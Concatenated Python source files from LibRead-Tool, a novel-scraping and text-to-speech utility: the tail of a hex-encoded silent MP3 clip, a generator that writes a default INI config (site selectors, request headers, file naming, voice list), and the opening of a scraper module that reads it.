000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000ffe318c4000b2361f800014d4d427d5fbfd4f39ce7a64177e8
4a1ce7febd3ffffce465e46a11ba13c4ce739c60062fffec41518780c075
84ee757b793647ea8bb3ddfe6457f4dd3affe318c40e0a9b621800008d4d
afffffd75d7ecae7643cdb215412828a239fad056a3d036ca148a4728a1f
ffdf4db5ebfba26d4ffffffffb7dfcc7abbc4bcce62d1100124ebbae0dff
e318c41e08f3662008008d4ce24e959587ae1fdeb3baf45fca93553eb95a
94f5ffffff5d5bd28fb29d8fb624414053e398eaa6d81a883c38d2d5027f
fe5ffd96477eba9fffffffffe318c43509cb62200801474df95cafea6473
20b2a071da250a169d67353a64af371d0084aae56753eb51cf3add7a7fb8
fffffffaccf7fd12a332040ec1453953ba59c5f7b0b064ffe318c448094b
66241000474804551f97e7f167e6b2fcbfff5fffffe967f5bb6525fd4f21
2a62d8505c50776121c7670302360a612a1ffd6a9feff45fa7e9fffffffb
7eef499d98ffe318c45d08cb621c00004d4d6aea3d4a7651c50b50cd3b87
97e603e1a1c0cf1c997a1fff6b7eff4ff5ffa7d2c99694dbfffffbb66f93
b218ce6d6851408107535453c6c60ead6cffe318c474099b5e2008004749
adc616993af51dbebffffff5ca9ffffffffeeb4f3a154e256c6b9ca531ca
3145158c1984863217465a3e00043101bffbb7a2153fe9ff54ee9a6befff
e318c48809e3622008014d4dfffff64bbce4a68a880851d5c6086769bf22
b240d3242342b2a0e858e399d5fff97cebe7be104f4078493429774b3a6c
1ef79ffdfffff6eff6bc7bffe318c49b0a9b661c08009330b66bf78ea40f
e943184cbd06420f98480fdc8511f2a706ffe7cfffefb94bffd52fbbff7f
dfabd8c6ae3bb1d852d0dd4350b7902cf456c8ab8a9001ffe318c4ab09b3
6a2408008d4e4f4c8c3d5294fa16612a01bfad77fad93efa2ebf5d5356aa
fffffe7e5c94bdddae33231ce96087193380aaed5580a0aca1889ed512e5
aa364e663fffe318c4bf0b236e1c1000934cd149063e69a32919cc200118
f159c59ffe5ffc8b25ee7bb739cbb573929af7bfdecfa60ccd9b504cda87
18569b11b4a22150d3e807a57de6aa41c9ffe318c4cd0c83621400004d10
12cc89d7f3f6225cafcb97cbfec3fafb0f19a55f502cd924ad8384aafa8b
60f32448cb0faf03a2c848c85411287594b503b29fcfc995e165f36ff5ff
e318c4d60b8b622010005349affe5ffffa94b3ca6efd6d49bc5a4b399204
063ae6ec805313409aa84bacd13942c490203042a89044660a00b9fe3cbd
fcbfffcbdce445d6f3ff9effe318c4e20a6b621c10008d4d7e7ab3ff14ec
7f75949d49fa923d66f1307b671e4f0155595c96483e2f95170751a4408a
84c414da17bcbd73813c3ce709feca87839f1a996e65efffe318c4f30ec3
5e100800532cf9fec2eea519316deb5ad49eb8510c2c8c9923844113e4a8
c422e2c4658c01c4a85720a7ac4d310604c7ff315a7f8320b18b66ee64f2
3afe72fe7fffe318c4f30db36a1c10005348f3d4adf389dc9a932880b944
2a878d38e96d8a0424407120408da21422048a035a7646cd1625892a0547
f244f2a2e7a6e82cc8e48f3330338c8907ffe318c4f70d5b6a1c10005348
7eab95ffa6f521972f0b0c74ed1f8e68e167cc09056365ca8ac7232b407a
b5751d2b949c2e96cc44b32108d5a76a0793fbd06673445d2e7ed59176ff
e318c4fc0d236220180059494622f47ffff2ec6bdff4bec6f3607f54d408
575c4c48449a5d0a264e235174497442ea28d0f449a90d0947e8d0e17ac6
40ce7ae475fffe5d9cacc3ffe318c4ff0e33621c100053494d6edf559669
94cd315d58e3cc9d2f121135012f58d82ab6e708476db03c0dcece9dba62
0a6a2aaa00c5c2c7cdc9851e877f05039c3f24ce5c66efffe318c4ff0ea3
5e1c180053495fe7e176ab16d7e395eae358a912a619192e66f83a1319b3
e7d19d9bfd917995d5201755bc9d1b0742d2f755fede47f2bb58afa22958
ca8f2b833bffe318c4ff10136a1c18005948a1d9a8311102c523b9d4c577
629e88142196c55b2cdb3b17f5d7c72ffbaa7d5da72eb78cd741947e2f48
9d736c283e98a454dbd43cd9a0b60d2634ffe318c4f90d6b621c10005349
75ee1f9fefd7cfed32ffbf1ffffffefffbf2b61baa664bcd7fd7cedcc9d0
9766d12cc29275ee90879a3caa14715d2949ffaebfbb04791613b15eb9ff
e318c4fe0d2b6a2418005964d3fffcbfdaacba8e3550c6a50f1b425fa491
88c4d85c8ca1429b24334e852322122325c05b645486952949e9d9c11b9c
e799d70d9cd99201959545ffe318c4ff0f8b6a181800594844fa7ffefb38
ff5539ca979ad3f2dc4d0a183dd534cf0ae19d864d983afb138a8509922a
9de9882a027fec5e79b23275f2c8425320949991ab5095ffe318c4fb1303
6a08000093108577c8f23ffff2fb4fcf7518abdeb5356b4d44926e5678b9
64a998aee992bc4aaa56b8b0b940d4ed9fffffffffcecfe77e4684c25326
1c984d7f09ffe318c4ea0af362200800534b3091d87342351108d7f34230
908986cecfffff7ca796ae7168d579cac3964540c9849489c91b252444cc
fa88a3c25894aa4c414d45332e39382e32ffe318c4f90d536a2818005348
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa4c414d45332e39382e32aaaaaaaaaaaaaaaaaaff
e318c4fe0ddb5e2418005348aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaffe318c4ff0eab5e101000532caaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaffe318c4ff10cb
65dc00004cbcaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaffe318c4f60000034800000000aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa54414732205365636f6e647320
6f662053696c656e636500000000000000000000416e617220536f667477
617265204c4c4300000000000000000000000000426c616e6b2041756469
6f0000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000ff
"""
xxdDump = xxdDump.replace("\n", "")
return binascii.unhexlify(xxdDump) | 78,058 | Python | .py | 1,283 | 59.829306 | 104 | 0.998763 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,191 | configGenerator.py | Spectre-hidN_LibRead-Tool/src/utils/configGenerator.py | def create_default_config(config_name):
searchResultSelector = "body > div.main > div.wp > div.row-box > div.col-content > div > div > div > div > div.txt > h3 > a"
statusSelectorI = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(6) > div > span"
statusSelectorII = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(5) > div > span"
statusSelectorIII = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.txt > div:nth-child(4) > div > span"
totalChaptersSelector = "#idData > li > a"
coverImageDivSelector = "body > div.main > div > div > div.col-content > div.m-info > div.m-book1 > div.m-imgtxt > div.pic > img"
articleDivSelector = "#article > p"
with open(config_name, 'w', encoding='utf-8') as cf:
cf.write(f"""[DOMAIN]
; Change the domain name
domainName = libread.com
; Modify the headers if the server is blocking your requests for being headless.
origin = https://libread.com
referer = https://libread.com/
authority = libread.com
userAgent = Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[SELECTOR_MAPS]
; These are the advanced settings to fix if the website changes its document structure.
; IT IS NOT RECOMMENDED TO MODIFY.
searchResultSelector = {searchResultSelector}
statusSelectorI = {statusSelectorI}
statusSelectorII = {statusSelectorII}
statusSelectorIII = {statusSelectorIII}
totalChaptersSelector = {totalChaptersSelector}
coverImageDivSelector = {coverImageDivSelector}
articleDivSelector = {articleDivSelector}
[NOMENCLATURES]
; You can only use the below variables to set up a name. use ! at both ends to indicate its a variable.
; TITLE -> Name of the novel
; STARTCHAPTER -> Indicates the starting chapter number of the part
; ENDCHAPTER -> Indicates the ending chapter number of the part
; Change the nomenclature for the output file. Affects both .txt and .mp3 file
outputNomenclature = !TITLE! ~ Chapter-!STARTCHAPTER!-!ENDCHAPTER!
; Nomenclature for the cover image
coverImageNomenclature = !TITLE! ~ Cover
; Replace WHITESPACE
; By befault it doesn't replace any WHITESPACE.
; But, if any of the variable has a WHITESPACE then it will be replaced by the given charater
whitespaceReplacementCharacter =
[TTS_CONFIG]
; Choose a voice name from the below list
Voice = en-GB-SoniaNeural
; Embed unsynced subtitles to the mp3 file
; 1 = yes, 0 = no
embedSubtitles = 1
; Enabling the below switch will force LibRead-Tool to fetch all the articles first in a part, then convert Text-To-Speech.
; Usually, this happens when FFMPEG is not accessible by LibRead-Tool.
; 1 = yes, 0 = no
forceGrabFirstThenConvert = 0
; If the below switch is enabled, then LibRead-Tool will replace the existing parts with the new ones.
; However, if you deactivate the switch, LibRead-Tool will not overwrite the material if the part file already exists, even if the contents are only partially available.
; Disabling this will force the "forceGrabFirstThenConvert" switch to be enabled.
; 1 = yes, 0 = no
replacePartContents = 1
; All Voices are lsited below
; Name: af-ZA-AdriNeural
; Gender: Female
;
; Name: af-ZA-WillemNeural
; Gender: Male
;
; Name: am-ET-AmehaNeural
; Gender: Male
;
; Name: am-ET-MekdesNeural
; Gender: Female
;
; Name: ar-AE-FatimaNeural
; Gender: Female
;
; Name: ar-AE-HamdanNeural
; Gender: Male
;
; Name: ar-BH-AliNeural
; Gender: Male
;
; Name: ar-BH-LailaNeural
; Gender: Female
;
; Name: ar-DZ-AminaNeural
; Gender: Female
;
; Name: ar-DZ-IsmaelNeural
; Gender: Male
;
; Name: ar-EG-SalmaNeural
; Gender: Female
;
; Name: ar-EG-ShakirNeural
; Gender: Male
;
; Name: ar-IQ-BasselNeural
; Gender: Male
;
; Name: ar-IQ-RanaNeural
; Gender: Female
;
; Name: ar-JO-SanaNeural
; Gender: Female
;
; Name: ar-JO-TaimNeural
; Gender: Male
;
; Name: ar-KW-FahedNeural
; Gender: Male
;
; Name: ar-KW-NouraNeural
; Gender: Female
;
; Name: ar-LB-LaylaNeural
; Gender: Female
;
; Name: ar-LB-RamiNeural
; Gender: Male
;
; Name: ar-LY-ImanNeural
; Gender: Female
;
; Name: ar-LY-OmarNeural
; Gender: Male
;
; Name: ar-MA-JamalNeural
; Gender: Male
;
; Name: ar-MA-MounaNeural
; Gender: Female
;
; Name: ar-OM-AbdullahNeural
; Gender: Male
;
; Name: ar-OM-AyshaNeural
; Gender: Female
;
; Name: ar-QA-AmalNeural
; Gender: Female
;
; Name: ar-QA-MoazNeural
; Gender: Male
;
; Name: ar-SA-HamedNeural
; Gender: Male
;
; Name: ar-SA-ZariyahNeural
; Gender: Female
;
; Name: ar-SY-AmanyNeural
; Gender: Female
;
; Name: ar-SY-LaithNeural
; Gender: Male
;
; Name: ar-TN-HediNeural
; Gender: Male
;
; Name: ar-TN-ReemNeural
; Gender: Female
;
; Name: ar-YE-MaryamNeural
; Gender: Female
;
; Name: ar-YE-SalehNeural
; Gender: Male
;
; Name: az-AZ-BabekNeural
; Gender: Male
;
; Name: az-AZ-BanuNeural
; Gender: Female
;
; Name: bg-BG-BorislavNeural
; Gender: Male
;
; Name: bg-BG-KalinaNeural
; Gender: Female
;
; Name: bn-BD-NabanitaNeural
; Gender: Female
;
; Name: bn-BD-PradeepNeural
; Gender: Male
;
; Name: bn-IN-BashkarNeural
; Gender: Male
;
; Name: bn-IN-TanishaaNeural
; Gender: Female
;
; Name: bs-BA-GoranNeural
; Gender: Male
;
; Name: bs-BA-VesnaNeural
; Gender: Female
;
; Name: ca-ES-EnricNeural
; Gender: Male
;
; Name: ca-ES-JoanaNeural
; Gender: Female
;
; Name: cs-CZ-AntoninNeural
; Gender: Male
;
; Name: cs-CZ-VlastaNeural
; Gender: Female
;
; Name: cy-GB-AledNeural
; Gender: Male
;
; Name: cy-GB-NiaNeural
; Gender: Female
;
; Name: da-DK-ChristelNeural
; Gender: Female
;
; Name: da-DK-JeppeNeural
; Gender: Male
;
; Name: de-AT-IngridNeural
; Gender: Female
;
; Name: de-AT-JonasNeural
; Gender: Male
;
; Name: de-CH-JanNeural
; Gender: Male
;
; Name: de-CH-LeniNeural
; Gender: Female
;
; Name: de-DE-AmalaNeural
; Gender: Female
;
; Name: de-DE-ConradNeural
; Gender: Male
;
; Name: de-DE-FlorianMultilingualNeural
; Gender: Male
;
; Name: de-DE-KatjaNeural
; Gender: Female
;
; Name: de-DE-KillianNeural
; Gender: Male
;
; Name: de-DE-SeraphinaMultilingualNeural
; Gender: Female
;
; Name: el-GR-AthinaNeural
; Gender: Female
;
; Name: el-GR-NestorasNeural
; Gender: Male
;
; Name: en-AU-NatashaNeural
; Gender: Female
;
; Name: en-AU-WilliamNeural
; Gender: Male
;
; Name: en-CA-ClaraNeural
; Gender: Female
;
; Name: en-CA-LiamNeural
; Gender: Male
;
; Name: en-GB-LibbyNeural
; Gender: Female
;
; Name: en-GB-MaisieNeural
; Gender: Female
;
; Name: en-GB-RyanNeural
; Gender: Male
;
; Name: en-GB-SoniaNeural
; Gender: Female
;
; Name: en-GB-ThomasNeural
; Gender: Male
;
; Name: en-HK-SamNeural
; Gender: Male
;
; Name: en-HK-YanNeural
; Gender: Female
;
; Name: en-IE-ConnorNeural
; Gender: Male
;
; Name: en-IE-EmilyNeural
; Gender: Female
;
; Name: en-IN-NeerjaExpressiveNeural
; Gender: Female
;
; Name: en-IN-NeerjaNeural
; Gender: Female
;
; Name: en-IN-PrabhatNeural
; Gender: Male
;
; Name: en-KE-AsiliaNeural
; Gender: Female
;
; Name: en-KE-ChilembaNeural
; Gender: Male
;
; Name: en-NG-AbeoNeural
; Gender: Male
;
; Name: en-NG-EzinneNeural
; Gender: Female
;
; Name: en-NZ-MitchellNeural
; Gender: Male
;
; Name: en-NZ-MollyNeural
; Gender: Female
;
; Name: en-PH-JamesNeural
; Gender: Male
;
; Name: en-PH-RosaNeural
; Gender: Female
;
; Name: en-SG-LunaNeural
; Gender: Female
;
; Name: en-SG-WayneNeural
; Gender: Male
;
; Name: en-TZ-ElimuNeural
; Gender: Male
;
; Name: en-TZ-ImaniNeural
; Gender: Female
;
; Name: en-US-AnaNeural
; Gender: Female
;
; Name: en-US-AndrewNeural
; Gender: Male
;
; Name: en-US-AriaNeural
; Gender: Female
;
; Name: en-US-AvaNeural
; Gender: Female
;
; Name: en-US-BrianNeural
; Gender: Male
;
; Name: en-US-ChristopherNeural
; Gender: Male
;
; Name: en-US-EmmaNeural
; Gender: Female
;
; Name: en-US-EricNeural
; Gender: Male
;
; Name: en-US-GuyNeural
; Gender: Male
;
; Name: en-US-JennyNeural
; Gender: Female
;
; Name: en-US-MichelleNeural
; Gender: Female
;
; Name: en-US-RogerNeural
; Gender: Male
;
; Name: en-US-SteffanNeural
; Gender: Male
;
; Name: en-ZA-LeahNeural
; Gender: Female
;
; Name: en-ZA-LukeNeural
; Gender: Male
;
; Name: es-AR-ElenaNeural
; Gender: Female
;
; Name: es-AR-TomasNeural
; Gender: Male
;
; Name: es-BO-MarceloNeural
; Gender: Male
;
; Name: es-BO-SofiaNeural
; Gender: Female
;
; Name: es-CL-CatalinaNeural
; Gender: Female
;
; Name: es-CL-LorenzoNeural
; Gender: Male
;
; Name: es-CO-GonzaloNeural
; Gender: Male
;
; Name: es-CO-SalomeNeural
; Gender: Female
;
; Name: es-CR-JuanNeural
; Gender: Male
;
; Name: es-CR-MariaNeural
; Gender: Female
;
; Name: es-CU-BelkysNeural
; Gender: Female
;
; Name: es-CU-ManuelNeural
; Gender: Male
;
; Name: es-DO-EmilioNeural
; Gender: Male
;
; Name: es-DO-RamonaNeural
; Gender: Female
;
; Name: es-EC-AndreaNeural
; Gender: Female
;
; Name: es-EC-LuisNeural
; Gender: Male
;
; Name: es-ES-AlvaroNeural
; Gender: Male
;
; Name: es-ES-ElviraNeural
; Gender: Female
;
; Name: es-ES-XimenaNeural
; Gender: Female
;
; Name: es-GQ-JavierNeural
; Gender: Male
;
; Name: es-GQ-TeresaNeural
; Gender: Female
;
; Name: es-GT-AndresNeural
; Gender: Male
;
; Name: es-GT-MartaNeural
; Gender: Female
;
; Name: es-HN-CarlosNeural
; Gender: Male
;
; Name: es-HN-KarlaNeural
; Gender: Female
;
; Name: es-MX-DaliaNeural
; Gender: Female
;
; Name: es-MX-JorgeNeural
; Gender: Male
;
; Name: es-NI-FedericoNeural
; Gender: Male
;
; Name: es-NI-YolandaNeural
; Gender: Female
;
; Name: es-PA-MargaritaNeural
; Gender: Female
;
; Name: es-PA-RobertoNeural
; Gender: Male
;
; Name: es-PE-AlexNeural
; Gender: Male
;
; Name: es-PE-CamilaNeural
; Gender: Female
;
; Name: es-PR-KarinaNeural
; Gender: Female
;
; Name: es-PR-VictorNeural
; Gender: Male
;
; Name: es-PY-MarioNeural
; Gender: Male
;
; Name: es-PY-TaniaNeural
; Gender: Female
;
; Name: es-SV-LorenaNeural
; Gender: Female
;
; Name: es-SV-RodrigoNeural
; Gender: Male
;
; Name: es-US-AlonsoNeural
; Gender: Male
;
; Name: es-US-PalomaNeural
; Gender: Female
;
; Name: es-UY-MateoNeural
; Gender: Male
;
; Name: es-UY-ValentinaNeural
; Gender: Female
;
; Name: es-VE-PaolaNeural
; Gender: Female
;
; Name: es-VE-SebastianNeural
; Gender: Male
;
; Name: et-EE-AnuNeural
; Gender: Female
;
; Name: et-EE-KertNeural
; Gender: Male
;
; Name: fa-IR-DilaraNeural
; Gender: Female
;
; Name: fa-IR-FaridNeural
; Gender: Male
;
; Name: fi-FI-HarriNeural
; Gender: Male
;
; Name: fi-FI-NooraNeural
; Gender: Female
;
; Name: fil-PH-AngeloNeural
; Gender: Male
;
; Name: fil-PH-BlessicaNeural
; Gender: Female
;
; Name: fr-BE-CharlineNeural
; Gender: Female
;
; Name: fr-BE-GerardNeural
; Gender: Male
;
; Name: fr-CA-AntoineNeural
; Gender: Male
;
; Name: fr-CA-JeanNeural
; Gender: Male
;
; Name: fr-CA-SylvieNeural
; Gender: Female
;
; Name: fr-CA-ThierryNeural
; Gender: Male
;
; Name: fr-CH-ArianeNeural
; Gender: Female
;
; Name: fr-CH-FabriceNeural
; Gender: Male
;
; Name: fr-FR-DeniseNeural
; Gender: Female
;
; Name: fr-FR-EloiseNeural
; Gender: Female
;
; Name: fr-FR-HenriNeural
; Gender: Male
;
; Name: fr-FR-RemyMultilingualNeural
; Gender: Male
;
; Name: fr-FR-VivienneMultilingualNeural
; Gender: Female
;
; Name: ga-IE-ColmNeural
; Gender: Male
;
; Name: ga-IE-OrlaNeural
; Gender: Female
;
; Name: gl-ES-RoiNeural
; Gender: Male
;
; Name: gl-ES-SabelaNeural
; Gender: Female
;
; Name: gu-IN-DhwaniNeural
; Gender: Female
;
; Name: gu-IN-NiranjanNeural
; Gender: Male
;
; Name: he-IL-AvriNeural
; Gender: Male
;
; Name: he-IL-HilaNeural
; Gender: Female
;
; Name: hi-IN-MadhurNeural
; Gender: Male
;
; Name: hi-IN-SwaraNeural
; Gender: Female
;
; Name: hr-HR-GabrijelaNeural
; Gender: Female
;
; Name: hr-HR-SreckoNeural
; Gender: Male
;
; Name: hu-HU-NoemiNeural
; Gender: Female
;
; Name: hu-HU-TamasNeural
; Gender: Male
;
; Name: id-ID-ArdiNeural
; Gender: Male
;
; Name: id-ID-GadisNeural
; Gender: Female
;
; Name: is-IS-GudrunNeural
; Gender: Female
;
; Name: is-IS-GunnarNeural
; Gender: Male
;
; Name: it-IT-DiegoNeural
; Gender: Male
;
; Name: it-IT-ElsaNeural
; Gender: Female
;
; Name: it-IT-GiuseppeNeural
; Gender: Male
;
; Name: it-IT-IsabellaNeural
; Gender: Female
;
; Name: ja-JP-KeitaNeural
; Gender: Male
;
; Name: ja-JP-NanamiNeural
; Gender: Female
;
; Name: jv-ID-DimasNeural
; Gender: Male
;
; Name: jv-ID-SitiNeural
; Gender: Female
;
; Name: ka-GE-EkaNeural
; Gender: Female
;
; Name: ka-GE-GiorgiNeural
; Gender: Male
;
; Name: kk-KZ-AigulNeural
; Gender: Female
;
; Name: kk-KZ-DauletNeural
; Gender: Male
;
; Name: km-KH-PisethNeural
; Gender: Male
;
; Name: km-KH-SreymomNeural
; Gender: Female
;
; Name: kn-IN-GaganNeural
; Gender: Male
;
; Name: kn-IN-SapnaNeural
; Gender: Female
;
; Name: ko-KR-HyunsuNeural
; Gender: Male
;
; Name: ko-KR-InJoonNeural
; Gender: Male
;
; Name: ko-KR-SunHiNeural
; Gender: Female
;
; Name: lo-LA-ChanthavongNeural
; Gender: Male
;
; Name: lo-LA-KeomanyNeural
; Gender: Female
;
; Name: lt-LT-LeonasNeural
; Gender: Male
;
; Name: lt-LT-OnaNeural
; Gender: Female
;
; Name: lv-LV-EveritaNeural
; Gender: Female
;
; Name: lv-LV-NilsNeural
; Gender: Male
;
; Name: mk-MK-AleksandarNeural
; Gender: Male
;
; Name: mk-MK-MarijaNeural
; Gender: Female
;
; Name: ml-IN-MidhunNeural
; Gender: Male
;
; Name: ml-IN-SobhanaNeural
; Gender: Female
;
; Name: mn-MN-BataaNeural
; Gender: Male
;
; Name: mn-MN-YesuiNeural
; Gender: Female
;
; Name: mr-IN-AarohiNeural
; Gender: Female
;
; Name: mr-IN-ManoharNeural
; Gender: Male
;
; Name: ms-MY-OsmanNeural
; Gender: Male
;
; Name: ms-MY-YasminNeural
; Gender: Female
;
; Name: mt-MT-GraceNeural
; Gender: Female
;
; Name: mt-MT-JosephNeural
; Gender: Male
;
; Name: my-MM-NilarNeural
; Gender: Female
;
; Name: my-MM-ThihaNeural
; Gender: Male
;
; Name: nb-NO-FinnNeural
; Gender: Male
;
; Name: nb-NO-PernilleNeural
; Gender: Female
;
; Name: ne-NP-HemkalaNeural
; Gender: Female
;
; Name: ne-NP-SagarNeural
; Gender: Male
;
; Name: nl-BE-ArnaudNeural
; Gender: Male
;
; Name: nl-BE-DenaNeural
; Gender: Female
;
; Name: nl-NL-ColetteNeural
; Gender: Female
;
; Name: nl-NL-FennaNeural
; Gender: Female
;
; Name: nl-NL-MaartenNeural
; Gender: Male
;
; Name: pl-PL-MarekNeural
; Gender: Male
;
; Name: pl-PL-ZofiaNeural
; Gender: Female
;
; Name: ps-AF-GulNawazNeural
; Gender: Male
;
; Name: ps-AF-LatifaNeural
; Gender: Female
;
; Name: pt-BR-AntonioNeural
; Gender: Male
;
; Name: pt-BR-FranciscaNeural
; Gender: Female
;
; Name: pt-BR-ThalitaNeural
; Gender: Female
;
; Name: pt-PT-DuarteNeural
; Gender: Male
;
; Name: pt-PT-RaquelNeural
; Gender: Female
;
; Name: ro-RO-AlinaNeural
; Gender: Female
;
; Name: ro-RO-EmilNeural
; Gender: Male
;
; Name: ru-RU-DmitryNeural
; Gender: Male
;
; Name: ru-RU-SvetlanaNeural
; Gender: Female
;
; Name: si-LK-SameeraNeural
; Gender: Male
;
; Name: si-LK-ThiliniNeural
; Gender: Female
;
; Name: sk-SK-LukasNeural
; Gender: Male
;
; Name: sk-SK-ViktoriaNeural
; Gender: Female
;
; Name: sl-SI-PetraNeural
; Gender: Female
;
; Name: sl-SI-RokNeural
; Gender: Male
;
; Name: so-SO-MuuseNeural
; Gender: Male
;
; Name: so-SO-UbaxNeural
; Gender: Female
;
; Name: sq-AL-AnilaNeural
; Gender: Female
;
; Name: sq-AL-IlirNeural
; Gender: Male
;
; Name: sr-RS-NicholasNeural
; Gender: Male
;
; Name: sr-RS-SophieNeural
; Gender: Female
;
; Name: su-ID-JajangNeural
; Gender: Male
;
; Name: su-ID-TutiNeural
; Gender: Female
;
; Name: sv-SE-MattiasNeural
; Gender: Male
;
; Name: sv-SE-SofieNeural
; Gender: Female
;
; Name: sw-KE-RafikiNeural
; Gender: Male
;
; Name: sw-KE-ZuriNeural
; Gender: Female
;
; Name: sw-TZ-DaudiNeural
; Gender: Male
;
; Name: sw-TZ-RehemaNeural
; Gender: Female
;
; Name: ta-IN-PallaviNeural
; Gender: Female
;
; Name: ta-IN-ValluvarNeural
; Gender: Male
;
; Name: ta-LK-KumarNeural
; Gender: Male
;
; Name: ta-LK-SaranyaNeural
; Gender: Female
;
; Name: ta-MY-KaniNeural
; Gender: Female
;
; Name: ta-MY-SuryaNeural
; Gender: Male
;
; Name: ta-SG-AnbuNeural
; Gender: Male
;
; Name: ta-SG-VenbaNeural
; Gender: Female
;
; Name: te-IN-MohanNeural
; Gender: Male
;
; Name: te-IN-ShrutiNeural
; Gender: Female
;
; Name: th-TH-NiwatNeural
; Gender: Male
;
; Name: th-TH-PremwadeeNeural
; Gender: Female
;
; Name: tr-TR-AhmetNeural
; Gender: Male
;
; Name: tr-TR-EmelNeural
; Gender: Female
;
; Name: uk-UA-OstapNeural
; Gender: Male
;
; Name: uk-UA-PolinaNeural
; Gender: Female
;
; Name: ur-IN-GulNeural
; Gender: Female
;
; Name: ur-IN-SalmanNeural
; Gender: Male
;
; Name: ur-PK-AsadNeural
; Gender: Male
;
; Name: ur-PK-UzmaNeural
; Gender: Female
;
; Name: uz-UZ-MadinaNeural
; Gender: Female
;
; Name: uz-UZ-SardorNeural
; Gender: Male
;
; Name: vi-VN-HoaiMyNeural
; Gender: Female
;
; Name: vi-VN-NamMinhNeural
; Gender: Male
;
; Name: zh-CN-XiaoxiaoNeural
; Gender: Female
;
; Name: zh-CN-XiaoyiNeural
; Gender: Female
;
; Name: zh-CN-YunjianNeural
; Gender: Male
;
; Name: zh-CN-YunxiNeural
; Gender: Male
;
; Name: zh-CN-YunxiaNeural
; Gender: Male
;
; Name: zh-CN-YunyangNeural
; Gender: Male
;
; Name: zh-CN-liaoning-XiaobeiNeural
; Gender: Female
;
; Name: zh-CN-shaanxi-XiaoniNeural
; Gender: Female
;
; Name: zh-HK-HiuGaaiNeural
; Gender: Female
;
; Name: zh-HK-HiuMaanNeural
; Gender: Female
;
; Name: zh-HK-WanLungNeural
; Gender: Male
;
; Name: zh-TW-HsiaoChenNeural
; Gender: Female
;
; Name: zh-TW-HsiaoYuNeural
; Gender: Female
;
; Name: zh-TW-YunJheNeural
; Gender: Male
;
; Name: zu-ZA-ThandoNeural
; Gender: Female
;
; Name: zu-ZA-ThembaNeural
; Gender: Male""")
cf.close()
| 17,755 | Python | .py | 998 | 16.365731 | 169 | 0.725966 | Spectre-hidN/LibRead-Tool | 8 | 0 | 1 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,192 | scrapper.py | Spectre-hidN_LibRead-Tool/src/utils/scrapper.py | import requests
from bs4 import BeautifulSoup
import os
import configparser
from .Prettify import Prettify
from .configGenerator import create_default_config
from requests.packages.urllib3.exceptions import InsecureRequestWarning #type: ignore
import urllib3
CONFIG_FILE = "libread-config.ini"
global DOMAIN_NAME
global SEARCH_PAGE_SELECTOR, STATUS_SELECTOR_I, STATUS_SELECTOR_II, STATUS_SELECTOR_III, CHAPTER_SELECTOR, IMAGE_URL_SELECTOR, ARTICLE_DIV_SELECTOR
global HEADERS
printWar = Prettify.printWar
printSuc = Prettify.printSuc
printErr = Prettify.printErr
def _readConfig():
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if(os.path.isfile(CONFIG_FILE)):
try:
config = configparser.ConfigParser()
config.read(CONFIG_FILE)
global SEARCH_PAGE_SELECTOR, STATUS_SELECTOR_I, STATUS_SELECTOR_II, STATUS_SELECTOR_III, CHAPTER_SELECTOR, IMAGE_URL_SELECTOR, ARTICLE_DIV_SELECTOR
SEARCH_PAGE_SELECTOR = config.get("SELECTOR_MAPS", "searchResultSelector")
STATUS_SELECTOR_I = config.get("SELECTOR_MAPS", "statusSelectorI")
STATUS_SELECTOR_II = config.get("SELECTOR_MAPS", "statusSelectorII")
STATUS_SELECTOR_III = config.get("SELECTOR_MAPS", "statusSelectorIII")
CHAPTER_SELECTOR = config.get("SELECTOR_MAPS", "totalChaptersSelector")
IMAGE_URL_SELECTOR = config.get("SELECTOR_MAPS", "coverImageDivSelector")
